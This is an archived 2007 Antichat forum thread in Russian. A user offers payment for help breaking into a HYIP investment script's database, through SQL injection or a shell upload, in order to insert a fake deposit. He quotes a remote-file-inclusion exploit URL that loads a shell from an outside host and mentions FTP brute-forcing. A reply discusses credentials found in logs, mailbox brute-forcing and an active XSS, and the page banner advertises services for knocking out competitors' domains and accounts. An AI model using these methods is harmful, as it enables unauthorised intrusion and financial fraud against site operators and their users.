Форум АНТИЧАТ - нужна помощь по скрипту за вознаграждение

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > SЕО/Финансовые задачи/Социальные сети > Покупка, Продажа, Обмен > О Работе
нужна помощь по скрипту за вознаграждение

Опции темы

Поиск в этой теме

Опции просмотра

нужна помощь по скрипту за вознаграждение

27.06.2007, 19:52

dokwill

Новичок

Регистрация: 25.06.2007

Сообщений: 16

Провел на форуме:
95371

Репутация: 8

нужна помощь по скрипту за вознаграждение

нужна помощь по скрипту за вознаграждение
http://www.megahyiptracer.com/hybann/h/
сдесь лежит мой скрипт - ( это соответственно мой сайт)

вопрос такой - несколько специфический
в этом скрипте и на этом движке есть возможность
видимо через sql injection или как то иначе пропихнуть в базу данных свой депозит.

мне требуется помощь в этом вопросе
нужен вход в базу ( сама строка есть)
либо метод или способ закачки файла(шелл) в
директорию сайта

имеется сам скрипт - могу переслать
имеются название и структура бд

есть публикации такой уязвимости

vendor : www.goldcoders.com
BY : www.hackerz.ir userz,ali
filez ----
inc/libs/Smarty.class.php
inc/libs/Smarty_Compiler.class.php
inc/libs/core/core.display_debug_console.php
inc/libs/core/core.load_plugins.php
inc/libs/core/core.load_resource_plugin.php
inc/libs/core/core.process_cached_inserts.php
inc/libs/core/core.process_compiled_include.php
inc/libs/core/core.read_cache_file.php
+++++++++++++++++++++++++++++++++
u can find more then this one
exploit :
http://victim/inc/libs/Smarty_Compiler.class.php?plugin_file=http://shell/?

ну у меня что то не катит она - мож не стой стороны сморю

вознаграждение - я на своем сайте подвешу ваш
запороленый proxy соответственно все логи и тд будут по вашей просьбе удалены. - скорость 2мбита трафика дам до 1 гига.
стучите все заинтересованные
291783239

27.06.2007, 23:48

censored!

Green member - Level 3

Регистрация: 02.11.2004

Сообщений: 1,337

Провел на форуме:
2398258

Репутация: 648

А может там смарти обновили, либо четко прописано откуда подгружать плагины?

__________________
+ (это не крестик, это плюсик!)
__________________
•
•
•

Последний раз редактировалось censored!; 27.06.2007 в 23:51..

28.06.2007, 00:17

dokwill

Новичок

Регистрация: 25.06.2007

Сообщений: 16

Провел на форуме:
95371

Репутация: 8

я специально поставил скрипт образца 05. 2006 - чтобы понять откуда ноги.
но никак не вычислю вход для mysql inject

пока единственный вариант брут фтп - но это последнее дело

хотелось бы без этого обойтись

04.07.2007, 12:20

Hawkins

Участник форума

Регистрация: 24.01.2007

Сообщений: 129

Провел на форуме:
932592

Репутация: 145

Отправить сообщение для Hawkins с помощью ICQ

Посмотрел в логах, нарыл подобную строку
admin@megahyiptracer.com:dokwill
Может банально в то время использовался один пасс?
Или сбрутили мыльник dokwill[at]rambler.ru, потом восстановили логин/пасс от фтп?
Зыж в гк скрипте ещё есть активная xss, вполне возможно, что была именно она использованна.
(пхп инклуд в Smarty у меня не прошёл ни на одном мониторе/хайпе, погуглил ещё - нашёл описание 1 в 1 для совершенно другого скрипта, но там тоже были эти-же файлы. Там прокатывало, возможно автор просто решил выпендриться и запостить "уязвимость" для гк скриптов.)

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Нужна помощь!	Black_Death	Болталка	7	11.12.2004 16:03
Нужна помощь...		Чаты	2	24.02.2003 02:17
Нужна помощь	Амир	Чаты	0	04.09.2002 11:21

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход